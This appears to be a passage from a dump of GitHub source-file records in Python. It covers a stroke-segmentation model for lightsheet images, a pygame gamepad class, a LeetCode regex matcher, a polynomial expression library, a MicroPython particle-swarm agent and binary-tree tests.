block2_scaled])\n\n return cnc\n\n\ndef FinalModel(x, layer_13, layer_14):\n x = ConvAndBatch(x, 32, strides=2)\n x = ConvAndBatch(x, 64, strides=2)\n x = ConvAndBatch(x, 156, strides=2)\n\n # context path\n cp = ContextPath(layer_13, layer_14)\n fusion = FeatureFusionModule(cp, x, 3)\n ans = UpSampling2D(size=(8, 8), interpolation='bilinear')(fusion)\n\n return ans\n\n\ndef get_model(imageNet=False):\n inputs = Input(shape=(608, 608, 3))\n x = Lambda(lambda image: preprocess_input(image))(inputs)\n if imageNet:\n xception = Xception(weights='imagenet', input_shape=(608, 608, 3), include_top=False)\n else:\n xception = Xception(weights=None, input_shape=(608, 608, 3), include_top=False)\n\n tail_prev = xception.get_layer('block13_pool').output\n tail = xception.output\n\n output = FinalModel(x, tail_prev, tail)\n\n return inputs, xception.input, output\n\ndef readTif(tifPath, keepThreshold=100, imgShape=(608, 608), filterDark=True, returnOriginal=False):\n assert os.path.exists(tifPath)\n imgStack = io.imread(tifPath)\n (steps, height, width) = imgStack.shape\n print(\"Image Stack Size:\", imgStack.shape)\n processedStacks = []\n originalStacks = []\n for step in range(steps):\n img8 = cv2.normalize(imgStack[step], None, 0, 255, cv2.NORM_MINMAX)\n img8 = np.asarray(img8, dtype='uint8')\n blur = cv2.GaussianBlur(img8, (3, 3), 0)\n imgResize = cv2.resize(blur, imgShape)\n img3Channel = cv2.cvtColor(imgResize, cv2.COLOR_GRAY2RGB)\n if filterDark:\n if np.max(imgResize) >= keepThreshold:\n processedStacks.append(img3Channel)\n else:\n processedStacks.append(img3Channel)\n if returnOriginal:\n imgOrignal = cv2.normalize(imgStack[step], None, 0, 255, cv2.NORM_MINMAX)\n imgOrignal = np.asarray(imgOrignal, dtype='uint8')\n originalStacks.append(imgOrignal)\n\n if returnOriginal:\n return processedStacks, originalStacks\n else:\n return processedStacks\n\ndef predict2Mask(prediction):\n copyMask = np.zeros(shape=(prediction.shape[0], prediction.shape[1], 3), dtype='uint8')\n binarayMask = np.argmax(prediction, axis=-1)\n for key in LABEL_DICT.keys():\n label = np.zeros(shape=(len(LABEL_DICT.keys()), ), dtype='uint8')\n label[LABEL_DICT[key]] = 1\n copyMask[binarayMask == LABEL_DICT[key], :] = label\n return copyMask\n\ndef label2Color(labelMask):\n copyMask 
= copy.deepcopy(labelMask)\n canvas = np.zeros(shape=(copyMask.shape[0], copyMask.shape[1], 3), dtype='uint8')\n for key in LABEL_DICT.keys():\n canvas[copyMask[:, :, LABEL_DICT[key]] == 1, :] = COLOR_DICT[key]\n return canvas\n\ndef softmax(X, theta = 1.0, axis = None):\n \"\"\"\n Compute the softmax of each element along an axis of X.\n\n Parameters\n ----------\n X: ND-Array. Probably should be floats.\n theta (optional): float parameter, used as a multiplier\n prior to exponentiation. Default = 1.0\n axis (optional): axis to compute values along. Default is the\n first non-singleton axis.\n\n Returns an array the same size as X. The result will sum to 1\n along the specified axis.\n \"\"\"\n\n # make X at least 2d\n y = np.atleast_2d(X)\n\n # find axis\n if axis is None:\n axis = next(j[0] for j in enumerate(y.shape) if j[1] > 1)\n\n # multiply y against the theta parameter,\n y = y * float(theta)\n\n # subtract the max for numerical stability\n y = y - np.expand_dims(np.max(y, axis = axis), axis)\n\n # exponentiate y\n y = np.exp(y)\n\n # take the sum along the specified axis\n ax_sum = np.expand_dims(np.sum(y, axis = axis), axis)\n\n # finally: divide elementwise\n p = y / ax_sum\n\n # flatten if X was 1D\n if len(X.shape) == 1: p = p.flatten()\n\n return p\n\nclass STROKE_MASK:\n def __init__(self, weights_folder):\n \"\"\"\n :param weights_folder: The path to the folder containing: \"checkpoint\", \"model.tf.index\"....\n \"\"\"\n inputs, xception_inputs, ans = get_model()\n self.model = Model(inputs=[inputs, xception_inputs], outputs=[ans])\n self.model_weights = os.path.join(weights_folder,\n [item for item in os.listdir(weights_folder) if \".index\" in item][0].replace(\n \".index\", \"\"))\n self.model.load_weights(self.model_weights)\n\n def visualize(self):\n \"\"\"\n Visualizing the model structure\n :return: None\n \"\"\"\n self.model.summary()\n\n def predict(self, tif_stack_list, heatmap=False, color=False):\n \"\"\"\n :param tif_stack_list: A list of numpy arrays, each array is a stack.\n :param heatmap: if true, Return the original predictions, has the same shape as input.\n axis 0 => background, 1 => Normal, 2 => Stroke\n The number in each axis indicates the confidence value.\n [\n (steps, height, width, 3),\n (steps, height, width, 3),\n ...\n ]\n If False, Return the one-hot label of predictions.\n [\n (steps, height, width, 3), [1, 0, 0] => background, [0, 1, 0] => Normal, [0, 0, 1] => Stroke\n (steps, height, width, 3),\n ...\n ]\n :param color: Covert one-hot predictions to color mask.\n :return: A list of predictions\n \"\"\"\n imgShape = (608, 608)\n result = []\n for tif_stack in tif_stack_list:\n assert len(tif_stack.shape) >= 3\n steps= tif_stack.shape[0]\n processedStack = []\n for step in range(steps):\n img8 = cv2.normalize(tif_stack[step], None, 0, 255, cv2.NORM_MINMAX)\n img8 = np.asarray(img8, dtype='uint8')\n blur = cv2.GaussianBlur(img8, (3, 3), 0)\n imgResize = cv2.resize(blur, imgShape)\n if len(imgResize.shape) == 3:\n img3Channel = imgResize\n else:\n img3Channel = cv2.cvtColor(imgResize, cv2.COLOR_GRAY2RGB)\n\n processedStack.append(img3Channel)\n processedStack = np.asarray(processedStack, dtype=np.float32)\n x = [processedStack, processedStack]\n predictions = self.model.predict(x, batch_size=4, verbose=1)\n\n if heatmap:\n result.append(softmax(predictions, axis=-1))\n else:\n tmp_result = []\n for i in range(steps):\n if color:\n tmp_result.append(label2Color(predict2Mask(predictions[i])))\n else:\n 
tmp_result.append(predict2Mask(predictions[i]))\n tmp_result = np.array(tmp_result)\n result.append(tmp_result)\n\n return result\n\ndef test():\n S = STROKE_MASK(r\"C:\\Projects\\lightsheetDL\\weights\")\n S.visualize()\n\n test_stacks = [\n np.array(readTif(r\"C:\\Projects\\lightsheetDL\\dataset\\raw\\mouse1_july30_crop.tif\", imgShape=(1216, 1216)))]\n result = S.predict(test_stacks, color=True)\n print(result[0].shape)\n for i in range(result[0].shape[0]):\n cv2.imshow('1', result[0][i])\n cv2.waitKey(1)\n\n result = S.predict(test_stacks, heatmap=True)\n print(result[0].shape)\n\n # result = S.predict(test_stacks, heatmap=False)\n # print(result[0].shape)\n\nif __name__ == '__main__':\n S = STROKE_MASK(r\"C:\\Projects\\lightsheetDL\\weights\")\n S.visualize()\n\n test_stacks = [\n np.array(readTif(r\"C:\\Projects\\lightsheetDL\\dataset\\raw\\mouse1_july30_crop.tif\", imgShape=(1216, 1216)))]\n # result = S.predict(test_stacks, color=True)\n # print(result[0].shape)\n # for i in range(result[0].shape[0]):\n # cv2.imshow('1', result[0][i])\n # cv2.waitKey(1)\n\n result = S.predict(test_stacks, heatmap=True)\n print(result[0].shape)\n\n","repo_name":"JulianPitney/Glycine_Transporter-1_Antagonist_Provides_Neuroprotection_in_Vivo_Lightsheet_Analysis","sub_path":"Step2_GenStrokeMask/src/strokeMaskAPI.py","file_name":"strokeMaskAPI.py","file_ext":"py","file_size_in_byte":10790,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"9778758708","text":"import time\nimport sys\nimport pygame\n\n\nclass Gamepad():\n\n def __init__(self, id):\n self.buttonFunctions = dict() # Dict which connects buttons to functions\n self.controller = None\n self.deadzone = 0.2\n pygame.init() # Scans system for joysticks, listens to events\n print(\"Number of joysticks found: \" + str(pygame.joystick.get_count()))\n if (pygame.joystick.get_count() > id):\n self.controller = pygame.joystick.Joystick(id)\n print(\"Connected to \" + self.controller.get_name())\n self.controller.init()\n print(\"Number of axes: \" + str(self.controller.get_numaxes())\n + \". Number of buttons: \" + str(self.controller.get_numbuttons()))\n else:\n print(\"Given joystick id not found.\")\n\n def update(self):\n self.checkPressedButtons()\n\n def enabled(self):\n ''' Returns true if controller is found. False otherwise. 
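The `softmax` helper above subtracts the per-axis maximum before exponentiating. That step changes nothing mathematically (softmax is shift-invariant) but keeps `np.exp` out of overflow territory for large logits; a compact standalone illustration:

```python
import numpy as np

# Shift-invariance of softmax: subtracting the max leaves the result
# unchanged, but keeps np.exp() in a safe range (exp(1000) overflows to inf).
def softmax_1d(x):
    z = x - np.max(x)
    e = np.exp(z)
    return e / e.sum()

x = np.array([1000.0, 1001.0, 1002.0])
print(softmax_1d(x))                 # well-defined, sums to 1
print(np.exp(x) / np.exp(x).sum())   # naive version: overflow warning, nan
```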
'''\n return self.controller != None\n\n def getYPR(self):\n yaw = self.apply_deadzone(self.getAxis(3)) # 3 = Right stick (left -1, right 1)\n pitch = self.apply_deadzone(self.getAxis(1)) # 1 = Left stick (up -1, down 1)\n roll = self.apply_deadzone(self.getAxis(0)) # 0 = Left stick (left -1, right 1)\n return yaw, pitch, roll\n\n\n def getThrottle(self):\n '''\n Scales throttle to a range of [0,1].\n Also applies a deadzone\n '''\n d = self.deadzone\n throttle = self.getAxis(2) + self.getAxis(5)\n throttle += 2 # Range [0,4]\n throttle += -d\n throttle = max(0, throttle)\n throttle /= (4 - d) # Range [0,1]\n return throttle\n\n def apply_deadzone(self, value):\n '''\n Applies deadzone and scales the value back to range of [0,1]\n '''\n d = self.deadzone\n if (abs(value) < d):\n return 0\n elif (value > 0): #positive\n value = (value - d) / (1.0 - d) # scales it back to [0,1]\n else: #negative\n value = (value + d) / (1.0 - d) # scales it back to [0,1]\n return value\n\n def printAllAxis(self):\n # 0 = Left stick (left -1, right 1)\n # 1 = Left stick (up -1, down 1)\n # 2 = Left trigger [-1,1]\n # 3 = Right stick (left -1, right 1)\n # 4 = Right stick (up -1, down 1)\n # 5 = Right trigger [-1,1]\n # Buttons:\n # 0 = A\n # 1 = B\n # 2 = X\n # 3 = Y\n # 4 = Left shoulder\n # 5 = Right shoulder\n # 6 = back\n # 7 = start\n # 8 = xbox\n # 9 = Left stick\n # 10 = Right stick\n for i in range(self.controller.get_numaxes()):\n print(i, \"=\", self.controller.get_axis(i), end=' ')\n print(\"\")\n\n def getAxis(self, number):\n \"\"\"Returns the current value of given axis\"\"\"\n if (not self.controller):\n print('no controller')\n return\n if (self.controller.get_numaxes() <= number):\n print(\"Warning: ControllerInput: Joystick axis\", number, \"not found.\")\n return 0\n return self.controller.get_axis(number)\n\n def connectButton(self, number, function):\n \"\"\"Connects a joystick button to given function.\n\n NOTE: The connected functions will only be called if checkPressedButtons\n is called. 
Therefore you have to periodically call checkPressedButtons.\n \"\"\"\n if (not self.controller):\n return\n if (self.controller.get_numbuttons() < number):\n print(\"Warning: ControllerInput: Attempted to connect to invalid button.\")\n if (number in self.buttonFunctions.keys()):\n print(\"Warning: ControllerInput: Overriding previously connected function.\")\n self.buttonFunctions[number] = function\n\n def checkPressedButtons(self):\n \"\"\"Checks for pressed buttons and calls their corresponding functions,\n if a function has been connected to the button.\n \"\"\"\n for event in pygame.event.get():\n if event.type == pygame.JOYBUTTONDOWN:\n #print(\"Pressed:\" + str(event.button))\n if (event.button in self.buttonFunctions.keys()):\n self.buttonFunctions[event.button]()\n\n def close(self):\n pygame.quit()\n\n\nif __name__ == \"__main__\":\n \"\"\"For quick debugging\"\"\"\n def test(yaw, pitch, roll):\n print(yaw, pitch, roll)\n controller = ControllerThread(0, test)\n controller.start()\n controller.connectButton(0, controller.printAllAxis)\n try:\n while(1):\n pass\n #controller.checkPressedButtons()\n except KeyboardInterrupt:\n pygame.quit()\n","repo_name":"debnera/arduino-quadcopter","sub_path":"FlightController/Python/GraphicalController/gamepad.py","file_name":"gamepad.py","file_ext":"py","file_size_in_byte":4697,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"14728052045","text":"class Solution(object):\n def isMatch(self, s, p):\n \"\"\"\n :type s: str\n :type p: str\n :rtype: bool\n \"\"\"\n ls = len(s)\n lp = len(p)\n print(\"ls, lp=\",ls, lp)\n ls = ls + 1\n lp = lp +1\n #if s == '' or p == ' ': \n #return False \n dp = [[False]*lp for i in range(ls)]\n print(\"array\",dp)\n dp[0][0] = True\n for i,c in enumerate(p):\n print(\"i,c=\",i, c,\"dp[\",0,\"][\",i-1,\"] = \", dp[0][i-1])\n if(c =='*' and dp[0][i-1]):\n print(\"dp 0\", i+1, \"=true\")\n dp[0][i+1] = True\n print(dp)\n for i,char_s in enumerate(s):\n for j,char_p in enumerate(p):\n print(\"i,s=\",i, char_s, \"\\tj,p=\", j,char_p)\n if char_p == char_s:\n print(\"p==s\")\n dp[i+1][j+1] = dp[i][j]\n if char_p == '.':\n print(\"p==.\")\n dp[i+1][j+1] = dp[i][j]\n if char_p =='*':\n if p[j-1] != s[i] and p[j-1] !='.':\n dp[i+1][j+1] = dp[i+1][j-1]\n else:\n dp[i+1][j+1] = (dp[i+1][j] or dp[i][j+1] or dp[i+1][j-1])\n print(\"\\t\\ts \\t0 \\t1 \\t2 \\t3\")\n print(\"p\")\n st = \"012345\"\n for i,e in enumerate(dp):\n if i < 6:\n print(st[i], end=\"=>\")\n for j, e2 in enumerate(e):\n print(\"\\t\",e2, end=\",\")\n print()\n print(\"dp[\",ls-1,\"][\",lp-1,\"] = \",dp[ls-1][lp-1])\n return dp[len(s)][len(p)]\na = Solution()\nsol = a.isMatch(\"abcd\", \"a*.cd\")\nprint(\"solution\")\nprint(sol)","repo_name":"WengTzu/LeetCode","sub_path":"Algorithm/10_Regular_Expression_Matching/10_Java_To_Python.py","file_name":"10_Java_To_Python.py","file_ext":"py","file_size_in_byte":1702,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"36680004206","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n__author__ = None\n__version__ = '1.0'\n__license__ = None\n__copyright__ = None\n\n\nimport unittest\n\nfrom ade_detection.cli_handler import CliHandler\nfrom ade_detection.cli import Parser\n\n\nclass RunCadecTest(unittest.TestCase):\n '''Test a single run on CADEC'''\n\n\n def test(self):\n command = '--run single_run_cadec.json'.split()\n args = Parser().parse_args(command) \n 
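The `apply_deadzone` method above does more than zero out small stick values: it rescales the surviving range so the output still spans the full [-1, 1] with no jump at the deadzone edge. A standalone sketch of that mapping (same formula, outside the class):

```python
# Deadzone with rescaling: values inside [-d, d] map to 0, and the remaining
# range is stretched back to [-1, 1] so output is continuous at |value| == d.
def apply_deadzone(value, d=0.2):
    if abs(value) < d:
        return 0.0
    sign = 1.0 if value > 0 else -1.0
    return sign * (abs(value) - d) / (1.0 - d)

assert apply_deadzone(0.1) == 0.0               # inside the deadzone
assert abs(apply_deadzone(0.2)) < 1e-9          # continuous at the edge
assert apply_deadzone(1.0) == 1.0               # full deflection preserved
assert abs(apply_deadzone(-0.6) + 0.5) < 1e-9   # ~ (-0.6 + 0.2) / 0.8
```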
CliHandler(args)\n","repo_name":"AilabUdineGit/ADE","sub_path":"integration_tests/run_cadec_test.py","file_name":"run_cadec_test.py","file_ext":"py","file_size_in_byte":460,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"35"} +{"seq_id":"24308799119","text":"from collections import Counter\nfrom enum import Enum\n\nimport numpy as np\nimport sympy\nfrom scipy import sparse\n\n__all__ = (\"Expr\", \"VariableType\", \"Variable\", \"Polynomial\")\n\n\nclass Expr(object):\n \"\"\" Algebraic expressions (multivariate monomials) in form of\n :math:`c x_1^{k_1} x_2^{k_2} \\cdots x_m^{k_m}.`\"\"\"\n\n def __init__(self, coeff=1, variables=Counter()):\n self.variables = variables\n self.coeff = coeff\n\n @staticmethod\n def cast(other):\n \"\"\" Casts its input to an expression.\"\"\"\n\n if not isinstance(other, Expr):\n return Expr(other)\n else:\n return other\n\n def __add__(self, other):\n \"\"\" Expression addition.\"\"\"\n return Polynomial(self) + other # lift to polynomials.\n\n def __radd__(self, other):\n # Note: Keep the original order of summands.\n return other + Polynomial(self) # lift to polynomials.\n\n def __sub__(self, other):\n \"\"\" Expression subtraction.\"\"\"\n return Polynomial(self) - other # lift to polynomials.\n\n def __mul__(self, other):\n \"\"\" Multiplication of algebraic expressions.\"\"\"\n if isinstance(other, Polynomial):\n return Polynomial(self) * other\n\n other = Expr.cast(other)\n\n # a^b * a^c = a^(b + c)\n x, y = Counter(self.variables), Counter(other.variables)\n return Expr(self.coeff * other.coeff, x + y)\n\n __rmul__ = __mul__ # make multiplication commute again.\n\n def __pow__(self, n):\n \"\"\" Expression exponentiation.\"\"\"\n assert n >= 0, \"negative exponent.\"\n\n if n == 0:\n return Expr(coeff=1, variables=Counter())\n\n xs = Counter(self.variables)\n for v in self.variables:\n xs[v] *= n # (a^b)^c = a^(b * c)\n\n return Expr(self.coeff ** n, xs)\n\n def __repr__(self):\n monic_monomial = \" \".join(\n [\n variable.__repr__() + \"^\" + str(self.variables[variable])\n for variable in self.variables\n ]\n )\n\n if self.coeff == 1 and len(monic_monomial) > 0:\n return monic_monomial\n else:\n return str(self.coeff) + \" \" + monic_monomial\n\n def related(self, other):\n \"\"\" Checks if the two expressions are related, i.e. have\n the same exponents and perpahs a different coefficient.\"\"\"\n other = Expr.cast(other)\n return self.variables == other.variables\n\n @property\n def is_constant(self):\n \"\"\" True iff the expression represents a constant.\"\"\"\n return len(self.variables) == 0\n\n @property\n def weight(self):\n return self.coeff * np.prod(\n [variable.value ** self.variables[variable] for variable in self.variables]\n )\n\n\nclass VariableType(Enum):\n PLAIN = 1 # regular, plain variables, e.g. Z.\n TYPE = 2 # variables corresponding to some types, i.e. 
having definitions.\n\n\nclass Variable(Expr):\n \"\"\" Symbolic variables.\"\"\"\n\n def __init__(self, tuning_param=None):\n super(Variable, self).__init__(1, Counter())\n\n self.variables[self] = 1\n self.type = VariableType.PLAIN\n self.tuning_param = tuning_param\n\n self.idx = None\n self.value = None\n\n @property\n def is_type_variable(self):\n \"\"\" True iff the variable represents a type variable.\n In other words, if it admits a defining equation.\"\"\"\n return self.type == VariableType.TYPE\n\n def __repr__(self):\n return \"var\" + str(self.idx)\n\n __str__ = __repr__\n\n def set_expectation(self, tuning_param):\n self.tuning_param = tuning_param\n\n\nclass Polynomial:\n \"\"\" Polynomials of multivariate algebraic expressions.\"\"\"\n\n def __init__(self, expressions):\n if isinstance(expressions, Expr):\n expressions = [expressions]\n\n self._expressions = expressions\n\n @staticmethod\n def cast(other):\n \"\"\" Casts its input to a polynomial.\"\"\"\n if isinstance(other, (int, float)):\n return Polynomial([Expr(other)])\n\n elif not isinstance(other, Polynomial):\n return Polynomial(other)\n\n else:\n return other\n\n @staticmethod\n def simplify(polynomial):\n \"\"\" Simplifies the given polynomial.\"\"\"\n\n equiv_classes = []\n n = len(polynomial)\n visited = [False] * n\n\n # group expressions\n for i in range(0, n):\n if not visited[i]:\n visited[i] = True\n equiv_class = [polynomial[i]]\n\n for j in range(i + 1, n):\n if polynomial[i].related(polynomial[j]):\n equiv_class.append(polynomial[j])\n visited[j] = True\n\n equiv_classes.append(equiv_class)\n\n # collect coefficients\n simpl_expressions = []\n for eqv in equiv_classes:\n\n coeff = 0\n for expr in eqv:\n coeff += expr.coeff\n\n if coeff != 0: # ignore vacuous terms\n expr = Expr(coeff, eqv[0].variables)\n simpl_expressions.append(expr)\n\n return Polynomial(simpl_expressions)\n\n @staticmethod\n def sum(series):\n \"\"\" Evaluates the sum of the given series.\"\"\"\n\n if len(series) > 0:\n p = series[0]\n for i in range(1, len(series)):\n p += series[i]\n\n return p\n else:\n return Polynomial(Expr(0))\n\n def __add__(self, other):\n \"\"\" Polynomial addition.\"\"\"\n other = Polynomial.cast(other)\n return Polynomial.simplify(self._expressions + other._expressions)\n\n def __radd__(self, other):\n # Note: Keep the original order of summands.\n other = Polynomial.cast(other)\n return Polynomial.simplify(other._expressions + self._expressions)\n\n def __sub__(self, other):\n \"\"\" Polynomial subtraction.\"\"\"\n if isinstance(other, (int, float)):\n return self + (-other)\n\n other = Polynomial.cast(other)\n xs = [-1 * e for e in other._expressions]\n return self + Polynomial(xs)\n\n def __mul__(self, other):\n \"\"\" Naive polynomial multiplication.\"\"\"\n other = Polynomial.cast(other)\n\n outcome = [] # naive but works\n for a in self._expressions:\n for b in other._expressions:\n outcome.append(a * b)\n\n return Polynomial.simplify(outcome)\n\n __rmul__ = __mul__ # make multiplication commute again\n\n def __pow__(self, n):\n \"\"\" Naive polynomial exponentiation.\"\"\"\n assert n >= 0, \"Non-positive exponent.\"\n\n if n == 0:\n return Polynomial(Expr(1))\n\n if n == 1:\n return Polynomial(self._expressions)\n\n if n % 2 == 1:\n return self * self ** (n - 1)\n else:\n other = self ** (n >> 1)\n return other * other\n\n def __iter__(self):\n return iter(self._expressions)\n\n def __repr__(self):\n return \" + \".join([expression.__repr__() for expression in self._expressions])\n\n def 
is_one(self):\n \"\"\" Checks if the polynomial represents a constant one.\"\"\"\n return (\n len(self._expressions) == 1\n and self._expressions[0].is_constant\n and self._expressions[0].coeff == 1\n )\n\n def is_variable(self):\n \"\"\" Checks if the polynomial represents a single variable.\"\"\"\n return len(self._expressions) == 1 and isinstance(\n self._expressions[0], Variable\n )\n\n @property\n def is_non_trivial(self):\n xs = [expr for expr in self._expressions if not expr.is_constant]\n return len(xs) > 1\n\n def specification(self, no_variables):\n \"\"\" Composes a sparse matrix specification of the polynomial. Requires\n as input a number dictating the number of columns of the constructed\n matrix (usually the number of variables in the corresponding\n optimisation problem).\n\n Its output is a tuple consisting of:\n\n (1) a sparse matrix representing the polynomial,\n (2) a vector of logarithms of monomial coefficients,\n (3) a (collective) constant term representing constant monomials.\n\n The matrix represents expoenents of respective variables.\"\"\"\n\n rows = 0 # row counter\n row, col, data = [], [], []\n constant_expr = 0\n coeffs = []\n\n for exp in self:\n if isinstance(exp, Expr):\n if exp.coeff <= 0 and not exp.is_constant:\n raise ValueError(\"Non-positive monomial coefficient.\")\n\n if exp.coeff > 0:\n # coeffs.append(sympy.log(exp.coeff))\n coeffs.append(np.float64((sympy.log(exp.coeff)).evalf()))\n else:\n constant_expr += exp.coeff\n\n for (v, e) in exp.variables.items():\n row.append(rows)\n col.append(v.idx)\n data.append(e)\n rows += 1\n else:\n constant_expr += exp # constant\n\n # create a sparse representation of the polynomial,\n # together with logarithms of respective monomial coefficients and\n # the collected constant term (unaltered).\n return (\n sparse.csr_matrix(\n (np.array(data), (np.array(row), np.array(col))),\n shape=(rows, no_variables),\n dtype=\"double\",\n ),\n np.array(coeffs),\n constant_expr,\n )\n","repo_name":"maciej-bendkowski/paganini","sub_path":"paganini/expressions.py","file_name":"expressions.py","file_ext":"py","file_size_in_byte":9563,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"35"} +{"seq_id":"40129116832","text":"import machine\nimport random\nimport ubinascii\nimport ujson\nimport urequests\nimport utime\nfrom hcsr04 import HCSR04\n\n\ndef func(x, y):\n return x ** 2 + y ** 2\n\n\ndef get_random():\n \"\"\"Get random value. 
Useful for emulated agent\"\"\"\n tv = int(utime.time())\n utime.sleep_ms(random.randrange(1, 100))\n r = float('0.{}'.format(tv)) * (-1) ** (int(utime.time()) % 2)\n\n return r\n\n\ndef get_location():\n \"\"\"Get location of agent\"\"\"\n return [get_random(), get_random()]\n\n\ndef get_parameters(url):\n \"\"\"Get from cloud main parameters for algorithm\"\"\"\n url += '/parameters'\n response = urequests.get(url)\n response_json = response.json()\n w = response_json['w']\n c1 = response_json['c1']\n c2 = response_json['c2']\n iterations = response_json['iterations']\n\n response.close()\n\n return w, c1, c2, iterations\n\n\ndef post_message(url, chip_id, message):\n \"\"\"Put status of agent into logger server\"\"\"\n response = urequests.post(url, data=ujson.dumps(\n {\n 'id': chip_id,\n 'message': message\n }\n ))\n response.close()\n\n\ndef post_data(url, chip_id, iteration, data, value):\n \"\"\"Put data of agent into cloud\"\"\"\n response = urequests.post(url, data=ujson.dumps(\n {\n 'id': chip_id,\n 'iteration': iteration,\n 'data': data,\n 'value': value\n }\n ))\n response.close()\n\n\ndef get_data(url, log_url, chip_id, iteration):\n \"\"\"\n Get main data from cloud.\n \"\"\"\n while True:\n response = urequests.get(url, data=ujson.dumps(\n {\n 'iteration': iteration\n }\n ))\n\n if response.status_code == 200:\n break\n\n message = 'Wait'\n post_message(log_url, chip_id, message)\n\n response.close()\n utime.sleep_ms(5000)\n\n response_json = response.json()\n gbest = response_json['Gbest']\n pbest = response_json['Pbest']\n r1 = response_json['r1']\n r2 = response_json['r2']\n\n response.close()\n\n return gbest, pbest, r1, r2\n\n\ndef run(chip_id, host, log_host, get_value_function):\n \"\"\"Main program of PSO algorithm\n\n :param chip_id: id of the chip\n :param host: host of the cloud\n :param log_host: host of the logger server\n :param get_value_function: function,\n which return value of the agent for specified location\n \"\"\"\n velocity = [0, 0]\n data = get_location()\n url = host + 'data'\n logger = log_host + 'message'\n\n w, c1, c2, iterations = get_parameters(url)\n\n for iteration in range(iterations):\n value = get_value_function(*data)\n\n message = ujson.dumps({\n 'iteration': iteration,\n 'data': data,\n 'value': value\n })\n post_message(logger, chip_id, message)\n post_data(url, chip_id, iteration, data, value)\n\n gbest, pbest, r1, r2 = get_data(url, logger, chip_id, iteration)\n\n for i in range(2):\n velocity[i] = w * velocity[i] + c1 * r1 * (\n pbest[i] - data[i]) + c2 * r2 * (gbest[i] - data[i])\n data[i] += velocity[i]\n\n\ndef main():\n with open('config.json', 'r') as file:\n config = ujson.load(file)\n\n # Get main parameters from config file config.json\n IP = config['host']\n PORT = config['port']\n LOG_PORT = config['logPort']\n HOST = '{}:{}/'.format(IP, PORT)\n LOG = '{}:{}/'.format(IP, LOG_PORT)\n\n # Set main variables for algorithm\n CHIP_ID = machine.unique_id()\n if CHIP_ID == b'upy-non-unique':\n CHIP_ID = 'agent-{}'.format(int(utime.time()))\n GET_VALUE_FUNCTION = lambda *args: func(*args)\n else:\n CHIP_ID = ubinascii.hexlify(machine.unique_id())\n\n trig_pin = 16\n echo_pin = 0\n sensor = HCSR04(trigger_pin=trig_pin, echo_pin=echo_pin)\n GET_VALUE_FUNCTION = lambda *args: sensor.distance_cm()\n\n # Run agent program\n run(CHIP_ID, HOST, LOG, GET_VALUE_FUNCTION)\n\n\nif __name__ == '__main__':\n 
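The loop in `run` above is the canonical particle swarm update: inertia `w` carries over the current velocity, while `c1` and `c2` weight the pull toward the particle's own best (`pbest`) and the swarm best (`gbest`), with `r1`/`r2` supplied by the server so every agent uses the same randomness per iteration. Stripped of the HTTP plumbing, one step reduces to this sketch:

```python
# Core PSO step, stripped of the networking above. w, c1, c2 correspond to
# the /parameters endpoint; r1, r2 are the shared per-iteration randoms.
def pso_step(position, velocity, pbest, gbest, w, c1, c2, r1, r2):
    new_v = [w * v + c1 * r1 * (p - x) + c2 * r2 * (g - x)
             for x, v, p, g in zip(position, velocity, pbest, gbest)]
    new_x = [x + v for x, v in zip(position, new_v)]
    return new_x, new_v

x, v = pso_step([0.0, 0.0], [0.0, 0.0],
                pbest=[1.0, 1.0], gbest=[2.0, 2.0],
                w=0.5, c1=1.0, c2=1.0, r1=0.5, r2=0.5)
print(x, v)  # both attraction terms pull the particle toward (1.5, 1.5)
```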
main()\n","repo_name":"LickevicVL/microSwarm","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3996,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"38303556278","text":"from core.abstractions import AbstractScenarioSerializer\nfrom core.decorators import try_except_wrapper\nfrom .word import Word\n\n\nclass WordsScenarioSerilizer(AbstractScenarioSerializer):\n\n @try_except_wrapper\n def serialize(self, m_data):\n result = []\n for d in m_data:\n if not isinstance(d, Word):\n raise ValueError('Incorrect data type')\n sc_part = {attr: getattr(d, attr) for attr in d.__slots__}\n result.append(sc_part)\n return result\n\n @try_except_wrapper\n def deserialize(self, sc_data):\n result = []\n for d in sc_data:\n word = Word(*[d[attr] for attr in Word.__slots__])\n result.append(word)\n return result\n","repo_name":"Serega-SPb/lang_tutor","sub_path":"modules/module_words/serializer.py","file_name":"serializer.py","file_ext":"py","file_size_in_byte":738,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"41241173558","text":"#! /usr/bin/env python3\n\nimport unittest\nimport TreeBinary as tb\nimport random\n\nclass TestTreeBinary(unittest.TestCase):\n def setUp(self):\n self.tree = tb.TreeBinary()\n \n self.keys = [12, 5, 18, 2, 9, 15, 19, 13, 17]\n for key in self.keys:\n self.tree.insert(tb.Node(key)) \n \n def test_search(self):\n self.assertEqual(12, self.tree.search(12).key)\n self.assertEqual(None, self.tree.search(7))\n\n def test_min_max(self):\n self.assertEqual(min(self.keys), self.tree.min.key)\n self.assertEqual(max(self.keys), self.tree.max.key) \n\n\n def test_predecessor(self):\n node_1 = self.tree.search(13)\n self.assertEqual(12, self.tree.predecessor(node_1).key)\n node_2 = self.tree.search(2)\n self.assertEqual(None, self.tree.predecessor(node_2))\n node_3 = self.tree.search(12)\n self.assertEqual(9, self.tree.predecessor(node_3).key)\n\n def test_successor(self):\n node_1 = self.tree.search(9)\n node_2 = self.tree.search(19)\n node_3 = self.tree.search(12)\n \n self.assertEqual(12, self.tree.successor(node_1).key) \n self.assertEqual(None, self.tree.successor(node_2))\n self.assertEqual(13, self.tree.successor(node_3).key)\n def test_insert_walk(self):\n self.assertEqual(sorted(self.keys), self.tree.walk_in_order())\n \n def test_delete(self):\n node_1 = self.tree.search(2)\n node_2 = self.tree.search(18)\n self.tree.delete(node_1)\n self.keys.remove(2)\n self.assertEqual(sorted(self.keys), self.tree.walk_in_order())\n self.tree.delete(node_2)\n self.keys.remove(18)\n self.assertEqual(sorted(self.keys), self.tree.walk_in_order())\n \n\nif __name__ == \"__main__\":\n 